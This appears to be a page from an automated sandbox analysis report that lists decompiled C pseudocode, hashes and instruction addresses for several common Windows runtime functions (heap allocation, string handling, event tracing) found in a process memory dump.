0x1e3da6c6
0x1e3da6d2
0x1e3da701
0x1e3da704
0x00000000
0x1e3da704
0x1e3da6d4
0x1e3da6d6
0x1e3da6d9
0x1e3da6db
0x1e3da6e1
0x1e3da6e6
0x1e3da6e8
0x1e3da6e8
0x1e3da6ea
0x00000000
0x1e3da6ea
0x1e3da688
0x1e3da692
0x1e3da694
0x1e3da699
0x00000000
0x00000000
0x1e3da69d
0x00000000

Memory Dump Source

Source File: 0000000A.00000002.490998213.000000001E380000.00000040.00000001.sdmp, Offset: 1E380000, based on PE: true

Associated: 0000000A.00000002.491590408.000000001E49B000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.491609660.000000001E49F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ca44c6230c13465597c2ec1198cd8034ac8ca2b9128d5f51653ca18b947774ad
Instruction ID: 047385e72dfa900d4c58540dc5985acfeb8664066e659e3fad2fce1e552b103f
Opcode Fuzzy Hash: ca44c6230c13465597c2ec1198cd8034ac8ca2b9128d5f51653ca18b947774ad
Instruction Fuzzy Hash: F4416B79A00315DFCB08CF58C990B99BBF2BF49314F1982AAE904AF344D775E902CB94

Uniqueness

Uniqueness Score: -1.00%

Function 1E3E3D43, Relevance: .1, Instructions: 106
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E1E3E3D43(signed short* __ecx, signed short* __edx, signed short* _a4, signed short** _a8, intOrPtr* _a12, intOrPtr* _a16) {
				intOrPtr _v8;
				char _v12;
				signed short** _t33;
				short* _t38;
				intOrPtr* _t39;
				intOrPtr* _t41;
				signed short _t43;
				intOrPtr* _t47;
				intOrPtr* _t53;
				signed short _t57;
				intOrPtr _t58;
				signed short _t60;
				signed short* _t61;

				_t47 = __ecx;
				_t61 = __edx;
				_t60 = ( *__ecx & 0x0000ffff) + 2;
				if(_t60 > 0xfffe) {
					L22:
					return 0xc0000106;
				}
				if(__edx != 0) {
					if(_t60 <= ( *(__edx + 2) & 0x0000ffff)) {
						L5:
						E1E3B7B60(0, _t61, 0x1e3811c4);
						_v12 =  *_t47;
						_v12 = _v12 + 0xfff8;
						_v8 =  *((intOrPtr*)(_t47 + 4)) + 8;
						E1E3B7B60(0xfff8, _t61,  &_v12);
						_t33 = _a8;
						if(_t33 != 0) {
							 *_t33 = _t61;
						}
						 *((short*)(_t61[2] + (( *_t61 & 0x0000ffff) >> 1) * 2)) = 0;
						_t53 = _a12;
						if(_t53 != 0) {
							_t57 = _t61[2];
							_t38 = _t57 + ((( *_t61 & 0x0000ffff) >> 1) - 1) * 2;
							while(_t38 >= _t57) {
								if( *_t38 == 0x5c) {
									_t41 = _t38 + 2;
									if(_t41 == 0) {
										break;
									}
									_t58 = 0;
									if( *_t41 == 0) {
										L19:
										 *_t53 = _t58;
										goto L7;
									}
									 *_t53 = _t41;
									goto L7;
								}
								_t38 = _t38 - 2;
							}
							_t58 = 0;
							goto L19;
						} else {
							L7:
							_t39 = _a16;
							if(_t39 != 0) {
								 *_t39 = 0;
								 *((intOrPtr*)(_t39 + 4)) = 0;
								 *((intOrPtr*)(_t39 + 8)) = 0;
								 *((intOrPtr*)(_t39 + 0xc)) = 0;
							}
							return 0;
						}
					}
					_t61 = _a4;
					if(_t61 != 0) {
						L3:
						_t43 = L1E3C4620(0,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t60);
						_t61[2] = _t43;
						if(_t43 == 0) {
							return 0xc0000017;
						}
						_t61[1] = _t60;
						 *_t61 = 0;
						goto L5;
					}
					goto L22;
				}
				_t61 = _a4;
				if(_t61 == 0) {
					return 0xc000000d;
				}
				goto L3;
			}

0x1e3e3d4c
0x1e3e3d50
0x1e3e3d55
0x1e3e3d5e
0x1e41e79a
0x00000000
0x1e41e79a
0x1e3e3d68
0x1e41e789
0x1e3e3d9d
0x1e3e3da3
0x1e3e3daf
0x1e3e3db5
0x1e3e3dbc
0x1e3e3dc4
0x1e3e3dc9
0x1e3e3dce
0x1e41e7ae
0x1e41e7ae
0x1e3e3dde
0x1e3e3de2
0x1e3e3de7
0x1e3e3e0d
0x1e3e3e13
0x1e3e3e16
0x1e3e3e1e
0x1e3e3e25
0x1e3e3e28
0x00000000
0x00000000
0x1e3e3e2a
0x1e3e3e2f
0x1e3e3e37
0x1e3e3e37
0x00000000
0x1e3e3e37
0x1e3e3e31
0x00000000
0x1e3e3e31
0x1e3e3e20
0x1e3e3e20
0x1e3e3e35
0x00000000
0x1e3e3de9
0x1e3e3de9
0x1e3e3de9
0x1e3e3dee
0x1e3e3dfd
0x1e3e3dff
0x1e3e3e02
0x1e3e3e05
0x1e3e3e05
0x00000000
0x1e3e3df0
0x1e3e3de7
0x1e41e78f
0x1e41e794
0x1e3e3d79
0x1e3e3d84
0x1e3e3d89
0x1e3e3d8e
0x00000000
0x1e41e7a4
0x1e3e3d96
0x1e3e3d9a
0x00000000
0x1e3e3d9a
0x00000000
0x1e41e794
0x1e3e3d6e
0x1e3e3d73
0x00000000
0x1e41e7b5
0x00000000

Memory Dump Source

Source File: 0000000A.00000002.490998213.000000001E380000.00000040.00000001.sdmp, Offset: 1E380000, based on PE: true

Associated: 0000000A.00000002.491590408.000000001E49B000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.491609660.000000001E49F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 871e59dfa0e8d500330433a12237276f230a25463040249b08ef9fb57f9baaec
Instruction ID: 23a5a4bb8602ccd0bf4caf92995f0b129c05b5c32a8ba26983bd8fba687c7162
Opcode Fuzzy Hash: 871e59dfa0e8d500330433a12237276f230a25463040249b08ef9fb57f9baaec
Instruction Fuzzy Hash: 5B313836A00221DBD725CF2AC851A6BBBF5EF84700B05836EE445DBB50E730E840C790

Uniqueness

Uniqueness Score: -1.00%

Function 1E427016, Relevance: .1, Instructions: 104
COMMON

Download Yara Rule

C-Code - Quality: 76%

			E1E427016(short __ecx, intOrPtr __edx, char _a4, char _a8, signed short* _a12, signed short* _a16) {
				signed int _v8;
				char _v588;
				intOrPtr _v592;
				intOrPtr _v596;
				signed short* _v600;
				char _v604;
				short _v606;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed short* _t55;
				void* _t56;
				signed short* _t58;
				signed char* _t61;
				char* _t68;
				void* _t69;
				void* _t71;
				void* _t72;
				signed int _t75;

				_t64 = __edx;
				_t77 = (_t75 & 0xfffffff8) - 0x25c;
				_v8 =  *0x1e49d360 ^ (_t75 & 0xfffffff8) - 0x0000025c;
				_t55 = _a16;
				_v606 = __ecx;
				_t71 = 0;
				_t58 = _a12;
				_v596 = __edx;
				_v600 = _t58;
				_t68 =  &_v588;
				if(_t58 != 0) {
					_t71 = ( *_t58 & 0x0000ffff) + 2;
					if(_t55 != 0) {
						_t71 = _t71 + ( *_t55 & 0x0000ffff) + 2;
					}
				}
				_t8 = _t71 + 0x2a; // 0x28
				_t33 = _t8;
				_v592 = _t8;
				if(_t71 <= 0x214) {
					L6:
					 *((short*)(_t68 + 6)) = _v606;
					if(_t64 != 0xffffffff) {
						asm("cdq");
						 *((intOrPtr*)(_t68 + 0x20)) = _t64;
						 *((char*)(_t68 + 0x28)) = _a4;
						 *((intOrPtr*)(_t68 + 0x24)) = _t64;
						 *((char*)(_t68 + 0x29)) = _a8;
						if(_t71 != 0) {
							_t22 = _t68 + 0x2a; // 0x2a
							_t64 = _t22;
							E1E426B4C(_t58, _t22, _t71,  &_v604);
							if(_t55 != 0) {
								_t25 = _v604 + 0x2a; // 0x2a
								_t64 = _t25 + _t68;
								E1E426B4C(_t55, _t25 + _t68, _t71 - _v604,  &_v604);
							}
							if(E1E3C7D50() == 0) {
								_t61 = 0x7ffe0384;
							} else {
								_t61 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
							}
							_push(_t68);
							_push(_v592 + 0xffffffe0);
							_push(0x402);
							_push( *_t61 & 0x000000ff);
							E1E3E9AE0();
						}
					}
					_t35 =  &_v588;
					if( &_v588 != _t68) {
						_t35 = L1E3C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t68);
					}
					L16:
					_pop(_t69);
					_pop(_t72);
					_pop(_t56);
					return E1E3EB640(_t35, _t56, _v8 ^ _t77, _t64, _t69, _t72);
				}
				_t68 = L1E3C4620(_t58,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t33);
				if(_t68 == 0) {
					goto L16;
				} else {
					_t58 = _v600;
					_t64 = _v596;
					goto L6;
				}
			}

0x1e427016
0x1e42701e
0x1e42702b
0x1e427033
0x1e427037
0x1e42703c
0x1e42703e
0x1e427041
0x1e427045
0x1e42704a
0x1e427050
0x1e427055
0x1e42705a
0x1e427062
0x1e427062
0x1e42705a
0x1e427064
0x1e427064
0x1e427067
0x1e427071
0x1e427096
0x1e42709b
0x1e4270a2
0x1e4270a6
0x1e4270a7
0x1e4270ad
0x1e4270b3
0x1e4270b6
0x1e4270bb
0x1e4270c3
0x1e4270c3
0x1e4270c6
0x1e4270cd
0x1e4270dd
0x1e4270e0
0x1e4270e2
0x1e4270e2
0x1e4270ee
0x1e427101
0x1e4270f0
0x1e4270f9
0x1e4270f9
0x1e42710a
0x1e42710e
0x1e427112
0x1e427117
0x1e427118
0x1e427118
0x1e4270bb
0x1e42711d
0x1e427123
0x1e427131
0x1e427131
0x1e427136
0x1e42713d
0x1e42713e
0x1e42713f
0x1e42714a
0x1e42714a
0x1e427084
0x1e427088
0x00000000
0x1e42708e
0x1e42708e
0x1e427092
0x00000000
0x1e427092

Memory Dump Source

Source File: 0000000A.00000002.490998213.000000001E380000.00000040.00000001.sdmp, Offset: 1E380000, based on PE: true

Associated: 0000000A.00000002.491590408.000000001E49B000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.491609660.000000001E49F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dea2d058829bca3bb104b1ffdeb2b7dd965dc9d8dfd593f930a517a430f3cdab
Instruction ID: 89305a3390720f72b4d89ff30efe019f96d62f47a86a2839fbb697de2da95b62
Opcode Fuzzy Hash: dea2d058829bca3bb104b1ffdeb2b7dd965dc9d8dfd593f930a517a430f3cdab
Instruction Fuzzy Hash: 3F31D3766047929BC311CF28D854A6AB7E5BF88700F414B2AF9959B790E730E904C7A5

Uniqueness

Uniqueness Score: -1.00%

Function 1E3CC182, Relevance: .1, Instructions: 104
COMMON

Download Yara Rule

C-Code - Quality: 68%

			E1E3CC182(void* __ecx, unsigned int* __edx, intOrPtr _a4) {
				signed int* _v8;
				char _v16;
				void* __ebx;
				void* __edi;
				signed char _t33;
				signed char _t43;
				signed char _t48;
				signed char _t62;
				void* _t63;
				intOrPtr _t69;
				intOrPtr _t71;
				unsigned int* _t82;
				void* _t83;

				_t80 = __ecx;
				_t82 = __edx;
				_t33 =  *((intOrPtr*)(__ecx + 0xde));
				_t62 = _t33 >> 0x00000001 & 0x00000001;
				if((_t33 & 0x00000001) != 0) {
					_v8 = ((0 | _t62 != 0x00000000) - 0x00000001 & 0x00000048) + 8 + __edx;
					if(E1E3C7D50() != 0) {
						_t43 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
					} else {
						_t43 = 0x7ffe0386;
					}
					if( *_t43 != 0) {
						_t43 = E1E478D34(_v8, _t80);
					}
					E1E3C2280(_t43, _t82);
					if( *((char*)(_t80 + 0xdc)) == 0) {
						E1E3BFFB0(_t62, _t80, _t82);
						 *(_t80 + 0xde) =  *(_t80 + 0xde) | 0x00000004;
						_t30 = _t80 + 0xd0; // 0xd0
						_t83 = _t30;
						E1E478833(_t83,  &_v16);
						_t81 = _t80 + 0x90;
						E1E3BFFB0(_t62, _t80 + 0x90, _t80 + 0x90);
						_t63 = 0;
						_push(0);
						_push(_t83);
						_t48 = E1E3EB180();
						if(_a4 != 0) {
							E1E3C2280(_t48, _t81);
						}
					} else {
						_t69 = _v8;
						_t12 = _t80 + 0x98; // 0x98
						_t13 = _t69 + 0xc; // 0x575651ff
						E1E3CBB2D(_t13, _t12);
						_t71 = _v8;
						_t15 = _t80 + 0xb0; // 0xb0
						_t16 = _t71 + 8; // 0x8b000cc2
						E1E3CBB2D(_t16, _t15);
						E1E3CB944(_v8, _t62);
						 *((char*)(_t80 + 0xdc)) = 0;
						E1E3BFFB0(0, _t80, _t82);
						 *((intOrPtr*)(_t80 + 0xd8)) = 0;
						 *((intOrPtr*)(_t80 + 0xc8)) = 0;
						 *((intOrPtr*)(_t80 + 0xcc)) = 0;
						 *(_t80 + 0xde) = 0;
						if(_a4 == 0) {
							_t25 = _t80 + 0x90; // 0x90
							E1E3BFFB0(0, _t80, _t25);
						}
						_t63 = 1;
					}
					return _t63;
				}
				 *((intOrPtr*)(__ecx + 0xc8)) = 0;
				 *((intOrPtr*)(__ecx + 0xcc)) = 0;
				if(_a4 == 0) {
					_t24 = _t80 + 0x90; // 0x90
					E1E3BFFB0(0, __ecx, _t24);
				}
				return 0;
			}

0x1e3cc18d
0x1e3cc18f
0x1e3cc191
0x1e3cc19b
0x1e3cc1a0
0x1e3cc1d4
0x1e3cc1de
0x1e412d6e
0x1e3cc1e4
0x1e3cc1e4
0x1e3cc1e4
0x1e3cc1ec
0x1e412d7d
0x1e412d7d
0x1e3cc1f3
0x1e3cc1ff
0x1e412d88
0x1e412d8d
0x1e412d94
0x1e412d94
0x1e412d9f
0x1e412da4
0x1e412dab
0x1e412db0
0x1e412db2
0x1e412db3
0x1e412db4
0x1e412dbc
0x1e412dc3
0x1e412dc3
0x1e3cc205
0x1e3cc205
0x1e3cc208
0x1e3cc20e
0x1e3cc211
0x1e3cc216
0x1e3cc219
0x1e3cc21f
0x1e3cc222
0x1e3cc22c
0x1e3cc234
0x1e3cc23a
0x1e3cc23f
0x1e3cc245
0x1e3cc24b
0x1e3cc251
0x1e3cc25a
0x1e3cc276
0x1e3cc27d
0x1e3cc27d
0x1e3cc25c
0x1e3cc25c
0x00000000
0x1e3cc25e
0x1e3cc1a4
0x1e3cc1aa
0x1e3cc1b3
0x1e3cc265
0x1e3cc26c
0x1e3cc26c
0x00000000

Memory Dump Source

Source File: 0000000A.00000002.490998213.000000001E380000.00000040.00000001.sdmp, Offset: 1E380000, based on PE: true

Associated: 0000000A.00000002.491590408.000000001E49B000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.491609660.000000001E49F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b4a3881b78bd852e90f123f8f308f7d6cb7f2242736900428c2759f2d7e2a9ea
Instruction ID: fcbeac3c14325ad5a12f5f1c9f7accdc96f7320d233cf135231ab2746b108c89
Opcode Fuzzy Hash: b4a3881b78bd852e90f123f8f308f7d6cb7f2242736900428c2759f2d7e2a9ea
Instruction Fuzzy Hash: A7312676A015C6AEDB08DBB5C890BD9F799BF42204F04475BC41C87201DB39BE45DBA1

Uniqueness

Uniqueness Score: -1.00%

Function 1E3DA70E, Relevance: .1, Instructions: 96
COMMON

Download Yara Rule

C-Code - Quality: 92%

			E1E3DA70E(intOrPtr* __ecx, char* __edx) {
				unsigned int _v8;
				intOrPtr* _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t16;
				intOrPtr _t17;
				intOrPtr _t28;
				char* _t33;
				intOrPtr _t37;
				intOrPtr _t38;
				void* _t50;
				intOrPtr _t52;

				_push(__ecx);
				_push(__ecx);
				_t52 =  *0x1e497b10; // 0x10
				_t33 = __edx;
				_t48 = __ecx;
				_v12 = __ecx;
				if(_t52 == 0) {
					 *0x1e497b10 = 8;
					 *0x1e497b14 = 0x1e497b0c;
					 *0x1e497b18 = 1;
					L6:
					_t2 = _t52 + 1; // 0x11
					E1E3DA990(0x1e497b10, _t2, 7);
					asm("bts ecx, eax");
					 *_t48 = _t52;
					 *_t33 = 1;
					L3:
					_t16 = 0;
					L4:
					return _t16;
				}
				_t17 = L1E3DA840(__edx, __ecx, __ecx, _t52, 0x1e497b10, 1, 0);
				if(_t17 == 0xffffffff) {
					_t37 =  *0x1e497b10; // 0x10
					_t3 = _t37 + 0x27; // 0x37
					__eflags = _t3 >> 5 -  *0x1e497b18; // 0x1
					if(__eflags > 0) {
						_t38 =  *0x1e497b9c; // 0x0
						_t4 = _t52 + 0x27; // 0x37
						_v8 = _t4 >> 5;
						_t50 = L1E3C4620(_t38 + 0xc0000,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t38 + 0xc0000, _t4 >> 5 << 2);
						__eflags = _t50;
						if(_t50 == 0) {
							_t16 = 0xc0000017;
							goto L4;
						}
						 *0x1e497b18 = _v8;
						_t8 = _t52 + 7; // 0x17
						E1E3EF3E0(_t50,  *0x1e497b14, _t8 >> 3);
						_t28 =  *0x1e497b14; // 0x77f07b0c
						__eflags = _t28 - 0x1e497b0c;
						if(_t28 != 0x1e497b0c) {
							L1E3C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t28);
						}
						_t9 = _t52 + 8; // 0x18
						 *0x1e497b14 = _t50;
						_t48 = _v12;
						 *0x1e497b10 = _t9;
						goto L6;
					}
					 *0x1e497b10 = _t37 + 8;
					goto L6;
				}
				 *__ecx = _t17;
				 *_t33 = 0;
				goto L3;
			}

0x1e3da713
0x1e3da714
0x1e3da717
0x1e3da71d
0x1e3da720
0x1e3da722
0x1e3da727
0x1e3da74a
0x1e3da754
0x1e3da75e
0x1e3da768
0x1e3da76a
0x1e3da773
0x1e3da78b
0x1e3da790
0x1e3da792
0x1e3da741
0x1e3da741
0x1e3da743
0x1e3da749
0x1e3da749
0x1e3da732
0x1e3da73a
0x1e3da797
0x1e3da79d
0x1e3da7a3
0x1e3da7a9
0x1e3da7b6
0x1e3da7bc
0x1e3da7ca
0x1e3da7e0
0x1e3da7e2
0x1e3da7e4
0x1e419bf2
0x00000000
0x1e419bf2
0x1e3da7ed
0x1e3da7f2
0x1e3da800
0x1e3da805
0x1e3da80d
0x1e3da812
0x1e419c08
0x1e419c08
0x1e3da818
0x1e3da81b
0x1e3da821
0x1e3da824
0x00000000
0x1e3da824
0x1e3da7ae
0x00000000
0x1e3da7ae
0x1e3da73c
0x1e3da73e
0x00000000

Memory Dump Source

Source File: 0000000A.00000002.490998213.000000001E380000.00000040.00000001.sdmp, Offset: 1E380000, based on PE: true

Associated: 0000000A.00000002.491590408.000000001E49B000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.491609660.000000001E49F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9ad3bb4ee6c0ec67943cb6911e444edfbb29ffa1f2260667193a77507c3415fd
Instruction ID: 7488f85067a9726b555e2fe3300d26c903cd8f72887d8d7afda696d296b0645f
Opcode Fuzzy Hash: 9ad3bb4ee6c0ec67943cb6911e444edfbb29ffa1f2260667193a77507c3415fd
Instruction Fuzzy Hash: 0A31FEB66042149FC705CF58D9C8F597BF9FB99358F400A5AE004A7348E3B1E906CB91

Uniqueness

Uniqueness Score: -1.00%

Function 1E3AAA16, Relevance: .1, Instructions: 93
COMMON

Download Yara Rule

C-Code - Quality: 95%

			E1E3AAA16(signed short* __ecx) {
				signed int _v8;
				intOrPtr _v12;
				signed short _v16;
				intOrPtr _v20;
				signed short _v24;
				signed short _v28;
				void* _v32;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t25;
				signed short _t38;
				signed short* _t42;
				signed int _t44;
				signed short* _t52;
				signed short _t53;
				signed int _t54;

				_v8 =  *0x1e49d360 ^ _t54;
				_t42 = __ecx;
				_t44 =  *__ecx & 0x0000ffff;
				_t52 =  &(__ecx[2]);
				_t51 = _t44 + 2;
				if(_t44 + 2 > (__ecx[1] & 0x0000ffff)) {
					L4:
					_t25 =  *0x1e497b9c; // 0x0
					_t53 = L1E3C4620(_t44,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t25 + 0x180000, _t51);
					__eflags = _t53;
					if(_t53 == 0) {
						L3:
						return E1E3EB640(_t28, _t42, _v8 ^ _t54, _t51, _t52, _t53);
					} else {
						E1E3EF3E0(_t53,  *_t52,  *_t42 & 0x0000ffff);
						 *((short*)(_t53 + (( *_t42 & 0x0000ffff) >> 1) * 2)) = 0;
						L2:
						_t51 = 4;
						if(L1E3B6C59(_t53, _t51, _t58) != 0) {
							_t28 = E1E3D5E50(0x1e38c338, 0, 0,  &_v32);
							__eflags = _t28;
							if(_t28 == 0) {
								_t38 = ( *_t42 & 0x0000ffff) + 2;
								__eflags = _t38;
								_v24 = _t53;
								_v16 = _t38;
								_v20 = 0;
								_v12 = 0;
								E1E3DB230(_v32, _v28, 0x1e38c2d8, 1,  &_v24);
								_t28 = E1E3AF7A0(_v32, _v28);
							}
							__eflags = _t53 -  *_t52;
							if(_t53 !=  *_t52) {
								_t28 = L1E3C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t53);
							}
						}
						goto L3;
					}
				}
				_t53 =  *_t52;
				_t44 = _t44 >> 1;
				_t58 =  *((intOrPtr*)(_t53 + _t44 * 2));
				if( *((intOrPtr*)(_t53 + _t44 * 2)) != 0) {
					goto L4;
				}
				goto L2;
			}

0x1e3aaa25
0x1e3aaa29
0x1e3aaa2d
0x1e3aaa30
0x1e3aaa37
0x1e3aaa3c
0x1e404458
0x1e404458
0x1e404472
0x1e404474
0x1e404476
0x1e3aaa64
0x1e3aaa74
0x1e40447c
0x1e404483
0x1e404492
0x1e3aaa52
0x1e3aaa54
0x1e3aaa5e
0x1e4044a8
0x1e4044ad
0x1e4044af
0x1e4044b6
0x1e4044b6
0x1e4044b9
0x1e4044bc
0x1e4044cd
0x1e4044d3
0x1e4044d6
0x1e4044e1
0x1e4044e1
0x1e4044e6
0x1e4044e8
0x1e4044fb
0x1e4044fb
0x1e4044e8
0x00000000
0x1e3aaa5e
0x1e404476
0x1e3aaa42
0x1e3aaa46
0x1e3aaa48
0x1e3aaa4c
0x00000000
0x00000000
0x00000000

Memory Dump Source

Source File: 0000000A.00000002.490998213.000000001E380000.00000040.00000001.sdmp, Offset: 1E380000, based on PE: true

Associated: 0000000A.00000002.491590408.000000001E49B000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.491609660.000000001E49F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6b66b66da4c46089983004327588f2fa87335a1b89f1a4e79877bc7976c49789
Instruction ID: 39d293114555fddff2d81b9b894a14c25e3e344d62b98adf71a44873c06b9058
Opcode Fuzzy Hash: 6b66b66da4c46089983004327588f2fa87335a1b89f1a4e79877bc7976c49789
Instruction Fuzzy Hash: 3031F272A00269ABCB15DF65CD81ABFB3B9FF44700F01466AF901E7240E739AD51CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 1E3D61A0, Relevance: .1, Instructions: 93
COMMON

Download Yara Rule

C-Code - Quality: 97%

			E1E3D61A0(signed int* __ecx) {
				intOrPtr _v8;
				char _v12;
				intOrPtr* _v16;
				intOrPtr _v20;
				intOrPtr _t30;
				intOrPtr _t31;
				void* _t32;
				intOrPtr _t33;
				intOrPtr _t37;
				intOrPtr _t49;
				signed int _t51;
				intOrPtr _t52;
				signed int _t54;
				void* _t59;
				signed int* _t61;
				intOrPtr* _t64;

				_t61 = __ecx;
				_v12 = 0;
				_t30 =  *((intOrPtr*)( *[fs:0x30] + 0x1e8));
				_v16 = __ecx;
				_v8 = 0;
				if(_t30 == 0) {
					L6:
					_t31 = 0;
					L7:
					return _t31;
				}
				_t32 = _t30 + 0x5d8;
				if(_t32 == 0) {
					goto L6;
				}
				_t59 = _t32 + 0x30;
				if( *((intOrPtr*)(_t32 + 0x30)) == 0) {
					goto L6;
				}
				if(__ecx != 0) {
					 *((intOrPtr*)(__ecx)) = 0;
					 *((intOrPtr*)(__ecx + 4)) = 0;
				}
				if( *((intOrPtr*)(_t32 + 0xc)) != 0) {
					_t51 =  *(_t32 + 0x10);
					_t33 = _t32 + 0x10;
					_v20 = _t33;
					_t54 =  *(_t33 + 4);
					if((_t51 | _t54) == 0) {
						_t37 = E1E3D5E50(0x1e3867cc, 0, 0,  &_v12);
						if(_t37 != 0) {
							goto L6;
						}
						_t52 = _v8;
						asm("lock cmpxchg8b [esi]");
						_t64 = _v16;
						_t49 = _t37;
						_v20 = 0;
						if(_t37 == 0) {
							if(_t64 != 0) {
								 *_t64 = _v12;
								 *((intOrPtr*)(_t64 + 4)) = _t52;
							}
							E1E479D2E(_t59, 0, _v12, _v8,  *( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x38) & 0x0000ffff,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x3c)));
							_t31 = 1;
							goto L7;
						}
						E1E3AF7C0(_t52, _v12, _t52, 0);
						if(_t64 != 0) {
							 *_t64 = _t49;
							 *((intOrPtr*)(_t64 + 4)) = _v20;
						}
						L12:
						_t31 = 1;
						goto L7;
					}
					if(_t61 != 0) {
						 *_t61 = _t51;
						_t61[1] = _t54;
					}
					goto L12;
				} else {
					goto L6;
				}
			}

0x1e3d61b3
0x1e3d61b5
0x1e3d61bd
0x1e3d61c3
0x1e3d61c7
0x1e3d61d2
0x1e3d61ff
0x1e3d61ff
0x1e3d6201
0x1e3d6207
0x1e3d6207
0x1e3d61d4
0x1e3d61d9
0x00000000
0x00000000
0x1e3d61df
0x1e3d61e2
0x00000000
0x00000000
0x1e3d61e6
0x1e3d61e8
0x1e3d61ee
0x1e3d61ee
0x1e3d61f9
0x1e41762f
0x1e417632
0x1e417635
0x1e417639
0x1e417640
0x1e41766e
0x1e417675
0x00000000
0x00000000
0x1e417681
0x1e417689
0x1e41768d
0x1e417691
0x1e417695
0x1e417699
0x1e4176af
0x1e4176b5
0x1e4176b7
0x1e4176b7
0x1e4176d7
0x1e4176dc
0x00000000
0x1e4176dc
0x1e4176a2
0x1e4176a9
0x1e417651
0x1e417653
0x1e417653
0x1e417656
0x1e417656
0x00000000
0x1e417656
0x1e417644
0x1e417646
0x1e417648
0x1e417648
0x00000000
0x00000000
0x00000000
0x00000000

Memory Dump Source

Source File: 0000000A.00000002.490998213.000000001E380000.00000040.00000001.sdmp, Offset: 1E380000, based on PE: true

Associated: 0000000A.00000002.491590408.000000001E49B000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.491609660.000000001E49F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a25d892cfff058f63505eb350c4afa23fe1ad606753e0c714ae6796708096041
Instruction ID: 7f23b3cf051ee0acb2961fddac7a6ebdd8b6d32c6e8d148440e5ef7af0aefc4f
Opcode Fuzzy Hash: a25d892cfff058f63505eb350c4afa23fe1ad606753e0c714ae6796708096041
Instruction Fuzzy Hash: F231AF726057018FD710CF09C814B16B7E9FB88B50F414A6EF9989B351D7B0E844CB91

Uniqueness

Uniqueness Score: -1.00%

Function 1E3E8EC7, Relevance: .1, Instructions: 92
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E1E3E8EC7(void* __ecx, void* __edx) {
				signed int _v8;
				signed int* _v16;
				intOrPtr _v20;
				signed int* _v24;
				char* _v28;
				signed int* _v32;
				intOrPtr _v36;
				signed int* _v40;
				signed int* _v44;
				signed int* _v48;
				intOrPtr _v52;
				signed int* _v56;
				signed int* _v60;
				signed int* _v64;
				intOrPtr _v68;
				signed int* _v72;
				char* _v76;
				signed int* _v80;
				signed int _v84;
				signed int* _v88;
				intOrPtr _v92;
				signed int* _v96;
				intOrPtr _v100;
				signed int* _v104;
				signed int* _v108;
				char _v140;
				signed int _v144;
				signed int _v148;
				signed int* _v152;
				char _v156;
				signed int* _v160;
				char _v164;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t67;
				intOrPtr _t70;
				void* _t71;
				void* _t72;
				signed int _t73;

				_t69 = __edx;
				_v8 =  *0x1e49d360 ^ _t73;
				_t48 =  *[fs:0x30];
				_t72 = __edx;
				_t71 = __ecx;
				if( *((intOrPtr*)( *[fs:0x30] + 0x18)) != 0) {
					_t48 = E1E3D4E70(0x1e4986e4, 0x1e3e9490, 0, 0);
					if( *0x1e4953e8 > 5 && E1E3E8F33(0x1e4953e8, 0, 0x2000) != 0) {
						_v156 =  *((intOrPtr*)(_t71 + 0x44));
						_v144 =  *(_t72 + 0x44) & 0x0000ffff;
						_v148 =  *(_t72 + 0x46) & 0x0000ffff;
						_v164 =  *((intOrPtr*)(_t72 + 0x58));
						_v108 =  &_v84;
						_v92 =  *((intOrPtr*)(_t71 + 0x28));
						_v84 =  *(_t71 + 0x24) & 0x0000ffff;
						_v76 =  &_v156;
						_t70 = 8;
						_v60 =  &_v144;
						_t67 = 4;
						_v44 =  &_v148;
						_v152 = 0;
						_v160 = 0;
						_v104 = 0;
						_v100 = 2;
						_v96 = 0;
						_v88 = 0;
						_v80 = 0;
						_v72 = 0;
						_v68 = _t70;
						_v64 = 0;
						_v56 = 0;
						_v52 = 0x1e4953e8;
						_v48 = 0;
						_v40 = 0;
						_v36 = 0x1e4953e8;
						_v32 = 0;
						_v28 =  &_v164;
						_v24 = 0;
						_v20 = _t70;
						_v16 = 0;
						_t69 = 0x1e38bc46;
						_t48 = E1E427B9C(0x1e4953e8, 0x1e38bc46, _t67, 0x1e4953e8, _t70,  &_v140);
					}
				}
				return E1E3EB640(_t48, 0, _v8 ^ _t73, _t69, _t71, _t72);
			}

0x1e3e8ec7
0x1e3e8ed9
0x1e3e8edc
0x1e3e8ee6
0x1e3e8ee9
0x1e3e8eee
0x1e3e8efc
0x1e3e8f08
0x1e421349
0x1e421353
0x1e42135d
0x1e421366
0x1e42136f
0x1e421375
0x1e42137c
0x1e421385
0x1e421390
0x1e421391
0x1e42139c
0x1e42139d
